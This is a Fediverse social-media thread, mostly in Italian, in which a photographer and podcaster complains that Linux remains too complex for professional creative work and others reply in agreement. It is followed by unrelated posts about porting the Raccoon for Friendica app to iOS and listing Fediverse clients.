Se scelgo di fare il podcaster o il videomaker non posso essere obbligato ad imparare tutto il funzionamento del sistema operativo, le librerie, i pacchetti. Se sono uno youtuber e voglio fare una diretta, un video, un podcast, con Windows/Mac ho la vita semplice, con Linux no.

Secondo voi la massa cosa sceglierà?

Se vi è parso uno sfogo è perché lo è. Perdonatemi.

Lo dico con tanto dispiacere, ma io tutto questo tempo e voglia non ce l'ho, perché queste cose le faccio nel tempo libero e non può diventare una via crucis.

Continuerò ad utilizzare sistemi GNU/Linux quando posso, magari sui vecchi dispositivi che uso per navigare, ma un utilizzo professionale, per me e per le mie esigenze, rimane un sogno. Spero che la comunità FOSS rifletta su questo: anziché dedicare tempo ad altro (vedi l'esistenza di migliaia di distribuzioni), secondo me sarebbe preferibile lavorare per ottimizzare, semplificare, rendere la vita davvero semplice agli utenti.

Ho lasciato un mondo linux che era già complesso qualche anno fa, per ritrovarlo oggi ancora più complesso. Finché non si semplificherà pesantemente, saremo sempre legati a Windows/Mac, agli USA, ai sistemi proprietari.

#linux
#opensource
#foss
#sistemioperativi
#alternativalinux

reshared this

in reply to Simon Perry

Condivido ogni parola. È un'analisi lucida basata su esperienza diretta e non è affatto dettata da ignoranza, come alcuni commenti sembrano suggerire. Scegliere l’open source solo perché è gratuito o per risparmiare sulle licenze non è una strategia valida per passare a Linux. Chi lavora ha bisogno di strumenti professionali che funzionano, con helpdesk serio. Per tutto il resto linux può essere la soluzione ideale.
in reply to Emanuele

@Emanuele grazie.

Più che altro, penso io, è inutile arrampicarsi sugli specchi e voler adottare per forza l'open source se un programma proprietario ti risparmia tempo, fatica, lavoro.

Chi lavora con il software non può permettersi di essere meno competitivo o metterci più tempo per fare qualcosa per usare a tutti i costi FOSS.

Quando facevo il sistemista ho installato centinaia di server web (o db server) linux con distribuzioni diverse, non solo per una questione di licenze ma perché per quella funzione linux è a dir poco perfetto.

Quando il fornitore del software che usi è un'azienda come Canon, Philips, e ti dice che il suo prodotto gira solo su windows, non ci puoi fare nulla, perché un'alternativa non esiste (penso al biomedicale, ad esempio). Ma anche banalmente active directory di Microsoft, fare tutto quello che fa AD con Linux sarebbe molto più dispendioso in termini di tempo.

Più in piccolo, vale la stessa cosa. Se devi scrivere una lettera o fare grafici e tabelle, va benissimo, ma se ti serve una cosa come Power Bi, c'è poco da fare: o usi Windows o usi Windows.

Tutto qua.

Sì, lo ammetto: il mio post era anche il mezzo sfogo di un fotografo frustrato perché i programmi che gli fanno editare uno scatto in 10 secondi anziché mezz'ora, per Linux non esistono, ma era anche più di questo. Sono contento che almeno tu e qualcun altro lo avete colto.

Unknown parent

@gino 🦊 LibreOffice è un must per tutti, credo ☺️ così come notepad++


e anche questa volta non sono stata eletta papa. succederà prima o poi.


@RaccoonForFriendica This weekend I took some time to investigate how much work would be needed to build an iOS version of the app, and it turned out that at least building and running a basic version of the app is doable with some minor changes (see here).

What do you think about it? Would you like to see a Raccoon on iOS too?

#friendica #friendicadev #androidapp #androiddev #fediverseapp #raccoonforfriendica #kotlin #multiplatform #kmp #compose #cmp #opensource #foss #procyonproject

Unknown parent

mastodon - Collegamento all'originale
fedicat

@feb I just added Raccoon for Lemmy and Friendica to the delightful client list on codeberg (Relatica is already on it)

codeberg.org/fediverse/delight…

RaccoonForFriendica reshared this.

Unknown parent

mastodon - Collegamento all'originale
fedicat

@feb It only lists open source projects but it's been around longer (for community contributions) and is pretty comprehensive. The list of platforms is good, too.

codeberg.org/fediverse/delight…

RaccoonForFriendica reshared this.